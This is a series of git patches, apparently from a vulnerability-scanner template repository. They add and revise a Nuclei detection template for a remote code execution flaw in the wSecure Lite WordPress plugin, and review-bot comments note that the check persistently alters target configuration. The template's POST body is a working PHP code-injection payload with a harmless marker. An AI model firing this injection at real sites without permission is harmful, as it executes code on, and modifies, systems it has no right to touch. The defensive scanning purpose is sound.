From 1af27d9260266eb7e5f27382a832ede96cbae7ef Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Thu, 15 Jul 2021 09:41:14 +0700
Subject: [PATCH 1/5] Create CVE-2016-10960.yaml
---
 CVE-2016-10960.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 CVE-2016-10960.yaml
diff --git a/CVE-2016-10960.yaml b/CVE-2016-10960.yaml
new file mode 100644
index 0000000000..3110e9b2eb
--- /dev/null
+++ b/CVE-2016-10960.yaml
@@ -0,0 +1,25 @@
+id: CVE-2016-10960
+
+info:
+ name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
+ author: daffainfo
+ severity: critical
+ description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+ tags: cve,cve2016,wordpress,wp-plugin,rce
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
+ body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Hello, world."
+ condition: and
+ - type: status
+ status:
+ - 200
From fb1f67ce26b0176e87ccc0ceb861d178c31ab398 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Thu, 15 Jul 2021 14:21:17 +0530
Subject: [PATCH 2/5] Rename CVE-2016-10960.yaml to cves/2016/CVE-2016-10960.yaml
---
 CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml (100%)
diff --git a/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
similarity index 100%
rename from CVE-2016-10960.yaml
rename to cves/2016/CVE-2016-10960.yaml
From 0c4a223fa0a19d54ed25bf9a758f39976db198f5 Mon Sep 17 00:00:00 2001
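Review bot: The single POST in the new-file hunk of PATCH 1/5 is state-changing, and nothing in the `info:` block tells an operator so. It sends `wsecure_action=update`, and the shape of the `publish` value suggests the injected PHP is written into the plugin's saved configuration, so the marker code would remain on every scanned site after the run; this is inferred from the payload and the CVE description, since the plugin code is not on the page. I would tag the template so it can be excluded from scans of production targets, `tags: cve,cve2016,wordpress,wp-plugin,rce,intrusive`, and add one sentence to `description` stating that the check modifies the plugin configuration and that the target needs cleanup afterwards. The same applies to the later revisions of the request in PATCH 4/5 and PATCH 5/5.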
From: Prince Chaddha
Date: Fri, 16 Jul 2021 11:13:17 +0530
Subject: [PATCH 3/5] Update CVE-2016-10960.yaml
---
 cves/2016/CVE-2016-10960.yaml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
index 3110e9b2eb..2894158ab8 100644
--- a/cves/2016/CVE-2016-10960.yaml
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -5,7 +5,10 @@ info:
 author: daffainfo
 severity: critical
 description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+ reference: |
+ - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
+ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
 tags: cve,cve2016,wordpress,wp-plugin,rce

 requests:
From 429bb01311ea967964cf2920178ac05cc3cd641a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 16 Jul 2021 17:46:33 +0530
Subject: [PATCH 4/5] Update CVE-2016-10960.yaml
---
 cves/2016/CVE-2016-10960.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
index 2894158ab8..eeea3b13d7 100644
--- a/cves/2016/CVE-2016-10960.yaml
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -15,13 +15,13 @@ requests:
 - method: POST
 path:
 - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
- body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="'
+ body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="'

 matchers-condition: and
 matchers:
 - type: word
 words:
- - "Hello, world."
+ - "Hello, world CVE-2016-10960."
 condition: and
 - type: status
 status:
From eaba7dc5defcf9fbc6db5818c8c53aa4e121f6ad Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 16 Jul 2021 17:54:37 +0530
Subject: [PATCH 5/5] Update CVE-2016-10960.yaml
---
 cves/2016/CVE-2016-10960.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
index eeea3b13d7..68f7e2616c 100644
--- a/cves/2016/CVE-2016-10960.yaml
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -15,14 +15,15 @@ requests:
 - method: POST
 path:
 - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
- body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="'
+ body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'

 matchers-condition: and
 matchers:
 - type: word
 words:
- - "Hello, world CVE-2016-10960."
+ - "Nuclei: CVE-2016-10960"
 condition: and
+ part: header
 - type: status
 status:
 - 200
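Review bot: The header marker matched in this hunk is a fixed string, so a hit does not prove that this particular run triggered it. If the injected `header(...)` call persists in the plugin configuration, as the `wsecure_action=update` request suggests, a site scanned earlier would keep emitting `Nuclei: CVE-2016-10960` and could still be reported as vulnerable after the plugin is upgraded. A per-run value would tie the finding to the current request: use `{{randstr}}` as the header value in the body and match `- "Nuclei: {{randstr}}"` in the word matcher. The `condition: and` left on the one-entry word matcher has no effect and could be dropped for readability.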